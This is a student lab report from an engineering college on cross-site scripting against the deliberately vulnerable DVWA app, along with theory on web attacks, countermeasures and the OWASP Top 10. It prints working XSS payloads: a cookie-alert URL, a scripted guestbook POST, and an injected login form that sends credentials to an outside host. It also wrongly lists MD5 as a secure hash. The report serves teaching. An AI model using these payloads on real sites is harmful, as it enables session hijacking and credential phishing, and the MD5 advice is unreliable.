Somaiya Vidyavihar University

K. J. Somaiya College of Engineering

Department of Computer Engineering

Title: Introduction to Open Web Application Security Project and implementation

of XSS.

Objective:
1. Understanding Cross-site scripting (XSS).
2. Understanding and exploring the concept of DVWA & Burp Suite.
3. Exploration of vulnerabilities for web based applications through XSS attack using
DVWA & Burp Suite.
4. In this experiment, we will be do the following:
(a) XSS Attack 1: Hijacking the user’s session
(b) XSS Attack 2: Perform unauthorized activities.
(c) XSS Attack 3: Phishing to steal user credentials.
(d) XSS Attack 4: Capture the keystrokes by injecting a keylogger.
(e) XSS Attack 5: Stealing sensitive information.

Expected Outcome of Experiment:

CO Outcome

CO3 Identify and analyze web attacks

Books/ Journals/ Websites referred:

● http://www.dvwa.co.uk/
● https://ensurtec.com/dvwa-part-2-exploiting-cross-site-scripting-xss-vulnerabilit
ies/
● https://www.youtube.com/watch?v=ivvTrTie16I
● https://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVW
Av107/lesson9/index.html
● https://pentest-tools.com/blog/xss-attacks-practical-scenarios/

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
Abstract:-

Explain Web application security, XSS

Web application security (also known as Web AppSec) is the idea of building websites
to function as expected, even when they are under attack. The concept involves a
collection of security controls engineered into a Web application to protect its assets
from potentially malicious agents. Web applications, like all software, inevitably
contain defects. Some of these defects constitute actual vulnerabilities that can be
exploited, introducing risks to organizations. Web application security defends against
such defects. It involves leveraging secure development practices and implementing
security measures throughout the software development life cycle (SDLC), ensuring
that design-level flaws and implementation-level bugs are addressed.

Cross-site scripting (XSS) is an attack in which an attacker injects malicious executable

scripts into the code of a trusted application or website. Attackers often initiate an XSS
attack by sending a malicious link to a user and enticing the user to click it. If the app
or website lacks proper data sanitization, the malicious link executes the attacker’s
chosen code on the user’s system. As a result, the attacker can steal the user’s active
session cookie.

Related Theory: -

Various attacks on web application security,

Web application security is crucial in safeguarding web applications from various

threats and attacks. Here are some common types of attacks on web application
security:

1. SQL Injection (SQLi): Attackers inject malicious SQL queries into input fields,
exploiting vulnerabilities in the application's SQL database. This allows them to access,
modify, or delete data, or even execute administrative operations.

2. Cross-Site Scripting (XSS): Attackers inject malicious scripts into web pages viewed
by other users. These scripts can steal session cookies, redirect users to malicious sites,
or deface websites. XSS can be stored (persistent) or reflected (non-persistent).

3. Cross-Site Request Forgery (CSRF): In CSRF attacks, attackers trick authenticated

users into executing actions on a web application without their knowledge. This is done
by crafting malicious requests that are automatically submitted when the victim visits a
page controlled by the attacker.

4. Session Hijacking: Attackers steal session identifiers (e.g., session cookies) to

impersonate authenticated users and gain unauthorized access to their accounts.

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
5. Clickjacking: Also known as UI redress attack, clickjacking involves tricking users into
clicking on malicious elements disguised as legitimate ones. These attacks can lead to
unintended actions being performed by users without their knowledge.

6. Path Traversal: Attackers exploit insecure file management mechanisms to access files
or directories that are outside of the web application's root directory. This can lead to
unauthorized access to sensitive system files or data.

7. XML External Entity (XXE) Injection: Attackers exploit vulnerabilities in XML parsers to
include external entities in XML documents processed by the application. This can lead to
information disclosure, server-side request forgery (SSRF), or denial of service (DoS)
attacks.

8. Security Misconfigurations: Improperly configured security settings, such as default

passwords, unnecessary services, or overly permissive access controls, can expose web
applications to various attacks.

9. Insecure Direct Object References (IDOR): Attackers exploit vulnerabilities that allow
them to manipulate object references (e.g., file paths, database keys) to access
unauthorized resources or perform unauthorized actions.

10. Server-Side Request Forgery (SSRF): Attackers trick the server into making malicious
requests on their behalf, often to internal or external systems. This can lead to data theft,
service disruption, or unauthorized access to sensitive resources.

11. Remote Code Execution (RCE): Attackers exploit vulnerabilities in web applications to
execute arbitrary code on the server. This can lead to complete compromise of the server,
data theft, or unauthorized access.

12. Brute Force Attacks: Attackers attempt to guess usernames and passwords by
systematically trying different combinations until they find the correct credentials. This can
be mitigated by implementing account lockout mechanisms and using strong
authentication methods.

These are just some of the many attacks that can threaten the security of web
applications. It's essential for developers to be aware of these threats and employ
appropriate security measures to mitigate them. Regular security audits, code reviews, and
penetration testing can help identify and address vulnerabilities in web applications.
Additionally, staying informed about emerging threats and best practices in web
application security is crucial for maintaining robust defenses.

XSS attacks

There are three main types of XSS attacks. These are:

● Reflected XSS, where the malicious script comes from the current HTTP
request.

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
● Stored XSS, where the malicious script comes from the website's database.
● DOM-based XSS, where the vulnerability exists in client-side code rather than
server-side code.

Reflected cross-site scripting

Reflected XSS is the simplest variety of cross-site scripting. It arises when an

application receives data in an HTTP request and includes that data within the
immediate response in an unsafe way.

Stored cross-site scripting

Stored XSS (also known as persistent or second-order XSS) arises when an application
receives data from an untrusted source and includes that data within its later HTTP
responses in an unsafe way.

The data in question might be submitted to the application via HTTP requests; for
example, comments on a blog post, user nicknames in a chat room, or contact details on
a customer order. In other cases, the data might arrive from other untrusted sources; for
example, a webmail application displaying messages received over SMTP, a marketing
application displaying social media posts, or a network monitoring application
displaying packet data from network traffic.

DOM-based cross-site scripting

DOM-based XSS (also known as DOM XSS) arises when an application contains some
client-side JavaScript that processes data from an untrusted source in an unsafe way,
usually by writing the data back to the DOM.

Countermeasures for both

Cross-site scripting prevention can generally be achieved via two layers of defense:

● Encode data on output

● Validate input on arrival

Preventing cross-site scripting is trivial in some cases but can be much harder
depending on the complexity of the application and the ways it handles
user-controllable data.

In general, effectively preventing XSS vulnerabilities is likely to involve a combination

of the following measures:

● Filter input on arrival. At the point where user input is received, filter as strictly
as possible based on what is expected or valid input.

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
● Encode data on output. At the point where user-controllable data is output in
HTTP responses, encode the output to prevent it from being interpreted as
active content. Depending on the output context, this might require applying
combinations of HTML, URL, JavaScript, and CSS encoding.
● Use appropriate response headers. To prevent XSS in HTTP responses that
aren't intended to contain any HTML or JavaScript, you can use the
Content-Type and X-Content-Type-Options headers to ensure that browsers
interpret the responses in the way you intend.
● Content Security Policy. As a last line of defense, you can use Content Security
Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur.
● Implementation Details:

1. Enlist all the Steps followed and various options explored

● security level: Low

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Reflected XSS

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
1) XSS attack 1: Hijacking the user’s session

Unset
http://localhost:81/vulnerabilities/xss_r/?name=<script>alert(do
cument.cookie)</script>

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
2) XSS attack 2: Performing unauthorized activities

<script>

fetch('http://localhost:81/vulnerabilities/xss_s/', {

method: 'POST',

headers: {

'Content-Type': 'application/x-www-form-urlencoded'

},

body: 'txtName=xss&mtxMessage=xss&btnSign=Sign+Guestbook'

})

</script>

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

3) XSS attack 3: Phishing to steal user credentials

Unset
http://localhost:81/vulnerabilities/xss_r/?name=<h3>Please login
to proceed</h3> <form
action=http://192.168.0.252:82>Username:<br><input
type="username" name="username"></br>Password:<br><input
type="password" name="password"></br><br><input type="submit"
value="Logon"></br>

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

4) XSS attack 4: Capturing the keystrokes by injecting a keylogger

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering

Conclusion:- Hence, we explored vulnerabilities for web based applications through

XSS attack using DVWA.

Post-Lab Questions:
1. What is OWASP? List the latest web security application risks by OWASP.

Ans: Top 10 Web Application Security Risks:

● A01:2021-Broken Access Control moves up from the fifth position; 94% of

applications were tested for some form of broken access control. The 34
Common Weakness Enumerations (CWEs) mapped to Broken Access Control
had more occurrences in applications than any other category.
● A02:2021-Cryptographic Failures shifts up one position to #2, previously
known as Sensitive Data Exposure, which was broad symptom rather than a
root cause. The renewed focus here is on failures related to cryptography which
often leads to sensitive data exposure or system compromise.
● A03:2021-Injection slides down to the third position. 94% of the applications
were tested for some form of injection, and the 33 CWEs mapped into this

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
category have the second most occurrences in applications. Cross-site Scripting
is now part of this category in this edition.
● A04:2021-Insecure Design is a new category for 2021, with a focus on risks
related to design flaws. If we genuinely want to “move left” as an industry, it
calls for more use of threat modeling, secure design patterns and principles, and
reference architectures.
● A05:2021-Security Misconfiguration moves up from #6 in the previous edition;
90% of applications were tested for some form of misconfiguration. With more
shifts into highly configurable software, it’s not surprising to see this category
move up. The former category for XML External Entities (XXE) is now part of
this category.
● A06:2021-Vulnerable and Outdated Components was previously titled Using
Components with Known Vulnerabilities and is #2 in the Top 10 community
survey, but also had enough data to make the Top 10 via data analysis. This
category moves up from #9 in 2017 and is a known issue that we struggle to test
and assess risk. It is the only category not to have any Common Vulnerability
and Exposures (CVEs) mapped to the included CWEs, so a default exploit and
impact weights of 5.0 are factored into their scores.
● A07:2021-Identification and Authentication Failures was previously Broken
Authentication and is sliding down from the second position, and now includes
CWEs that are more related to identification failures. This category is still an
integral part of the Top 10, but the increased availability of standardized
frameworks seems to be helping.
● A08:2021-Software and Data Integrity Failures is a new category for 2021,
focusing on making assumptions related to software updates, critical data, and
CI/CD pipelines without verifying integrity. One of the highest weighted
impacts from Common Vulnerability and Exposures/Common Vulnerability
Scoring System (CVE/CVSS) data mapped to the 10 CWEs in this category.
Insecure Deserialization from 2017 is now a part of this larger category.
● A09:2021-Security Logging and Monitoring Failures was previously
Insufficient Logging & Monitoring and is added from the industry survey (#3),
moving up from #10 previously. This category is expanded to include more
types of failures, is challenging to test for, and isn’t well represented in the
CVE/CVSS data. However, failures in this category can directly impact
visibility, incident alerting, and forensics.
● A10:2021-Server-Side Request Forgery is added from the Top 10 community
survey (#1). The data shows a relatively low incidence rate with above average
testing coverage, along with above-average ratings for Exploit and Impact
potential. This category represents the scenario where the security community

Course: Information Security Lab Sem-VI Jan-May 2024 Page:

 Somaiya Vidyavihar University
K. J. Somaiya College of Engineering
Department of Computer Engineering
members are telling us this is important, even though it’s not illustrated in the
data at this time.

2. Explain countermeasures for injection attacks.

Ans: To defend against SQL injections you need to implement a few secure coding
practices and run any vulnerability assessment tool. First of all:

● Source Code Review (There are few tools to employ)

● Sanitizing and validating the input field
● Reject entries that contain Binary data, escape sequences and comment
characters
● Checking the privileges of a user’s connection to the database
● Strong passwords for SA and Administrator accounts.
● Use IDS and IPS. I would suggest Snort (IDS- Intrusion prevention system,
IPS- Intrusion prevention system)
● Use secure hash algorithms such as SHA256, MD5 etc…
● Apply least privilege rule to run the application that access database (Generally
we run with admin privileges by default which is not advisable)

3. List the types of XSS attacks.

There are three main types of XSS attacks. These are:

● Reflected XSS, where the malicious script comes from the current
HTTP request.
● Stored XSS, where the malicious script comes from the website's
database.
● DOM-based XSS, where the vulnerability exists in client-side code
rather than server-side code.

Course: Information Security Lab Sem-VI Jan-May 2024 Page: